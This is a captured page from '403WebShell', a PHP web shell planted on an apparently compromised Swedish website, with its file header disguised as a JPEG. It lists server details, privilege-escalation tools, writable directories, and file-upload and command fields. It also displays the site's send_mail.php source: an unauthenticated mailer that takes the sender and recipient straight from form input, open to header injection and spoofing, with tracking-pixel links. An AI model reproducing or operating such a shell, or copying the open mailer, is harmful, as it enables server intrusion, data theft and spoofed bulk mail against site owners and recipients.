????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.153.166
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/crm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.notes-online.se/crm/send_mail.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Namnlöst dokument</title>
<style type="text/css">
#form1 table tr td {
	font-family: Verdana, Geneva, sans-serif;
}
#form1 table {
	font-size: 12px;
}
</style>

<?php
if($_GET['action'] == "send"){

    $headers  = 'MIME-Version: 1.0' . "\r\n";
    $headers .= "Content-type: text/html; charset=UTF-8\r\n"; 
    $headers .= "From: ".$_POST['from']."\r\n";
    
    $to = $_POST['to'];
    $from = $_POST['from'];
    $message = $_POST['message'];
    $subject = $_POST['subject'];
    
    $message = html_entity_decode(nl2br(str_replace("[EMAIL]",$to,$message)));
    $message = str_replace("\\","",$message);
    
    mail($to, $subject, $message, $headers);	
    echo("<script>alert('Mail was sent!');</script>");
}

?>

</head>

<body>
<form id="form1" name="form1" method="post" action="send_mail.php?action=send">
  <p>&nbsp;</p>
  <table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td width="115" valign="top">Send mail to:</td>
      <td width="685" valign="top"><label for="to"></label>
        <input name="to" type="text" id="to" size="30" /></td>
    </tr>
    <tr>
      <td valign="top">Send mail from:</td>
      <td valign="top"><label for="from"></label>
        <input name="from" type="text" id="from" value="pavan.soma@astacus.se" size="30" /></td>
    </tr>
    <tr>
      <td valign="top">Subject:</td>
      <td valign="top"><input name="subject" type="text" id="subject" value="Increase your work process efficiency using Notes Online!" size="30" />
      <br />
      <br /></td>
    </tr>
    <tr>
      <td valign="top">Message:</td>
      <td valign="top"><label for="textarea2"></label>
      <textarea name="message" id="message" cols="80" rows="25" spellcheck="true"><html><body>Hello,

Do you want to easily and efficiently mark changes and add notes to drawings?

Let me introduce you to Notes Online, a free iPad and iPhone app for marking changes in or adding notes to drawings and pictures. This useful tool will increase your work process efficiency.

Please see <a href="http://www.notes-online.se/crm/track.php?email=[EMAIL]&goto=http://www.notes-online.se/en">www.notes-online.se/en</a> for detailed information about the features available in the latest version of Notes Online.

When you have registered you get one hour of CAD services at no charge!

Please do not hesitate to contact me if you have any questions.
 
Best Regards,
PavanKumar
Astacus AB
 
Email us: notes@astacus.se
Phone: +46 8 559 26 433
Skype: sales.astacus1
<a href="http://www.notes-online.se/crm/track.php?email=[EMAIL]&goto=http://www.notes-online.se/en">http://www.notes-online.se/en</a>
Visit: Norra Oskarsgatan 27a, Linköping, Sweden

The email has been created specifically for you by visiting your website, and has been sent individually. If you do not wish to receive these emails in the future, you can easily unsubscribe at any time by sending an email to info@astacus.se with the word REMOVE in the subject line.

<img src="http://www.notes-online.se/crm/track.php?email=[EMAIL]&goto=OPENED" width="1" height="1" />
</body>
</html>
    </textarea></td>
    </tr>
    <tr>
      <td valign="top">&nbsp;</td>
      <td valign="top"><p><br />
        <input type="submit" name="button" id="button" value="Send and trace email!" />
      </p></td>
    </tr>
  </table>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit